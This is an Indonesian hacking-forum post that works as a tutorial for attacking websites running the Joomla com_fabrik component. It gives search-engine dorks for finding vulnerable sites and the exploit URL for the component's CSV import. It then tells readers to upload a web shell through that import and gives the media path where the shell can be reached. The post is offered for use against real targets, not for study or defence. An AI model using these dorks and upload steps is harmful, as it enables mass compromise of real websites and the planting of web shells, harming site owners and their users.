eXploit Com_Fabrik

by Nue Bhandell - 05-23-2016 at 03:56 AM
Staff
Moderators
Posts:
45
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#1
OP
Posted: 05-23-2016, 03:56 AM (This post was last modified: 05-23-2016, 03:57 AM by Nue Bhandell.)
[Image: bug.jpg]
hehehe, pagi Gengs, iseng2 buka folder lawas, eh nemu file isinya webtarget, pas di coba eh ada salah satu yg masih vuln exploit Com_Fabrik nih. haha yowes gua bikin bahan utk tutorial artikel diPorum ini aja. Berharap ada agan yg bisa ngembangin Dork Freshnya, dan Teknik ini bisa mengemparkan dunia persilatan di Jones-H lagi akwkwak >.<" . *curhatan mengenang masalalu :'D

yg dah Master Minggir dlu Bebz :heart:

Dork:
inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:
inurl:index.php?option=com_fabrik&view= site:
inurl:importcsv.php site:
inurl:viewTable?cid= site:com

Exploit: 
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
or
/index.php?option=com_fabrik&amp;c=import&amp;view=import&amp;filetype=csv&amp;tableid=1echercher 

dan kebetulan ditarget Nue kali ini, Exploitnya terletak di:
target.coli/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

[Image: etBWWqA.png]

Tuh tinggal Upload Shell/File agan saja  :D
Lalu Klik Import CSV

Shell/File Akses o.O ?? /media/namashell
cth: target.coli/media/nueenggakpernah.php

[Image: vIHqkld.png]

Yuk yang regional Jakarta Join Grup FB: BackBox Jakarta Team

xixihi kunjungin Blog ane juga yak  :rolleyes: TKJ Cyber Art 

semoga bermanfaat Gengs, maap kalo post cupu  [Image: smile.png] 
waktunya Nue dan tim Katakan Putus cabut dulu gengs,   [Image: cool.png] 


Bye~


SUMUR
Reply
Find Posts
Register an account or login to reply
Create an account
Create a free account today and start posting right away. It only takes a few seconds.
Login
Log into an existing account.